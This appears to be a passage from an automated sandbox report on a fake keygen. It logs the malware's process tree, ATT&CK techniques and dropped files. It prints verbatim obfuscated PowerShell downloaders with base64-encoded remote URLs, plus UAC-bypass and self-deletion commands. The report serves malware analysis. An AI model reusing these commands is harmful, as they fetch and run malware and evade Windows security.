                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1984
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2680
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2680 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\090528101849332\\* & exit
                      9⤵
                        PID:2120
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2680
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:980
                • C:\Users\Public\zwx.exe
                  "C:\Users\Public\zwx.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1228
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\b1.hta"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2044
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1500
              • C:\Users\Public\zwx.exe
                "C:\Users\Public\zwx.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2924
                • C:\Users\Public\zwx.exe
                  "C:\Users\Public\zwx.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2556
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:2032
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1120
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:764
              • C:\Users\Public\bka.exe
                "C:\Users\Public\bka.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2352
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2520
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2692
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2692 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\542976160352634\\* & exit
                      8⤵
                        PID:2392
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2692
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2856
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2600
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2852
                  • C:\Users\Public\bka.exe
                    "C:\Users\Public\bka.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2704
                    • C:\Users\Admin\AppData\Local\Temp\pPXZiSlY03.exe
                      "C:\Users\Admin\AppData\Local\Temp\pPXZiSlY03.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:2408
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:2448
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:2860
                              • C:\Windows\SysWOW64\reg.exe
                                reg delete hkcu\Environment /v windir /f
                                10⤵
                                • Modifies registry key
                                PID:1620
                              • C:\Windows\SysWOW64\reg.exe
                                reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                10⤵
                                • Modifies registry key
                                PID:2920
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                10⤵
                                  PID:856
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              8⤵
                                PID:2464
                            • C:\Users\Admin\AppData\Local\Temp\F3ikf234hz.exe
                              "C:\Users\Admin\AppData\Local\Temp\F3ikf234hz.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              PID:2936
                              • \??\c:\windows\SysWOW64\cmstp.exe
                                "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\o44lrnhb.inf
                                8⤵
                                  PID:2768
                              • C:\Users\Admin\AppData\Local\Temp\fsaIULkkTI.exe
                                "C:\Users\Admin\AppData\Local\Temp\fsaIULkkTI.exe"
                                7⤵
                                • Executes dropped EXE
                                • Windows security modification
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2240
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" Get-MpPreference -verbose
                                  8⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2128
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\bka.exe"
                                7⤵
                                  PID:1504
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:1588
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:552
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1564

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    6
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Install Root Certificate

                    1
                    T1130

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\MSVCP140.dll
                    • C:\ProgramData\VCRUNTIME140.dll
                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\msvcp140.dll
                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\sqlite3.dll
                    • C:\ProgramData\sqlite3.dll
                    • C:\ProgramData\vcruntime140.dll
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_17313290-8770-4fa0-b810-020f0e21b1b9
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_65e9a883-487a-447c-a810-1a6f5ed74d31
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cdd07d8a-e1d4-4504-9593-fe63f7dbb577
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f86f0731-e596-4ffd-b246-e3f692d3c206
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\F3ikf234hz.exe
                    • C:\Users\Admin\AppData\Local\Temp\F3ikf234hz.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\fsaIULkkTI.exe
                    • C:\Users\Admin\AppData\Local\Temp\fsaIULkkTI.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\pPXZiSlY03.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\pPXZiSlY03.exe
                      MD5

                      27aef776631102d9d48154bd30c53f04

                      SHA1

                      f9cc81feb195ad9efa62845a12a964472fdb451e

                      SHA256

                      87a1c496ab124ad809aa7109024464f4c5924a2cd738c6997468c35b457d5771

                      SHA512

                      7a321eb797eb6a253b626941f1beef3798567f46cd0f18be8d5728f55d4e2621ad8c7f10d22ed28d97b762f7f878985c9d9357530a1ece8b4929872356d9eb04

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Public\Natso.bat
                    • C:\Users\Public\bka.exe
                    • C:\Users\Public\bka.exe
                    • C:\Users\Public\bka.exe
                    • C:\Users\Public\ymc.exe
                    • C:\Users\Public\ymc.exe
                    • C:\Users\Public\ymc.exe
                    • C:\Users\Public\zwx.exe
                    • C:\Users\Public\zwx.exe
                    • C:\Users\Public\zwx.exe
                    • C:\Users\Public\zwx.exe
                    • C:\Users\Public\zwx.exe
                    • C:\Windows\temp\o44lrnhb.inf
                    • \??\PIPE\srvsvc
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\sqlite3.dll
                    • \Users\Admin\AppData\Local\Temp\DE0F.tmp\Keygen.exe
                    • \Users\Admin\AppData\Local\Temp\F3ikf234hz.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\fsaIULkkTI.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\pPXZiSlY03.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • \Users\Public\bka.exe
                    • \Users\Public\bka.exe
                    • \Users\Public\ymc.exe
                    • \Users\Public\ymc.exe
                    • \Users\Public\zwx.exe
                    • memory/552-20-0x0000000000000000-mapping.dmp
                    • memory/764-46-0x0000000002750000-0x0000000002751000-memory.dmp
                      Filesize

                      4KB

                    • memory/764-21-0x0000000000000000-mapping.dmp
                    • memory/764-29-0x0000000070EE0000-0x00000000715CE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/768-25-0x0000000000000000-mapping.dmp
                    • memory/768-32-0x0000000070EE0000-0x00000000715CE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/768-52-0x0000000005340000-0x0000000005341000-memory.dmp
                      Filesize

                      4KB

                    • memory/768-34-0x0000000001E90000-0x0000000001E91000-memory.dmp
                      Filesize

                      4KB

                    • memory/856-614-0x0000000000000000-mapping.dmp
                    • memory/960-65-0x0000000006220000-0x0000000006221000-memory.dmp
                      Filesize

                      4KB

                    • memory/960-66-0x0000000006270000-0x0000000006271000-memory.dmp
                      Filesize

                      4KB

                    • memory/960-195-0x00000000066D0000-0x00000000066D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/960-60-0x00000000061E0000-0x00000000061E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/960-31-0x0000000070EE0000-0x00000000715CE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/960-73-0x00000000063D0000-0x00000000063D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/960-22-0x0000000000000000-mapping.dmp
                    • memory/960-79-0x0000000006400000-0x0000000006401000-memory.dmp
                      Filesize

                      4KB

